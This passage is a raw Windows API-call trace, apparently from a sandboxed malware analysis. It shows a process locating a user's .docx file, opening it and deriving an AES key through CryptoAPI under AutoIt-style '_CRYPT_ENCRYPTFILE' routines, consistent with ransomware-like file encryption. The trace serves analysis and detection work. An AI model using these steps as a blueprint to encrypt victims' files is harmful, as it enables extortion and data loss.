lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.891] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.891] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0170.891] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0170.891] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0170.891] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.891] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.891] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.891] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.891] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0x45d595f0, ftLastWriteTime.dwHighDateTime=0x1d5921d, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 0x90ae18 [0170.892] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0170.892] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.892] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.892] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.892] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0170.892] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.892] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0170.892] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.892] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0170.892] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.893] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.893] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.893] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.893] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0170.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.893] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0170.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0170.895] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.895] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.895] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0170.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.895] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.895] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.896] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.896] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.896] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.896] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0170.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.896] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.897] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.897] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.897] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.897] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.897] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.898] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0170.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.898] CryptDestroyHash (hHash=0x90af58) returned 1 [0170.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j0tjz4pqz2gw.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0170.898] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.898] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0170.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0170.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0170.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0170.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: 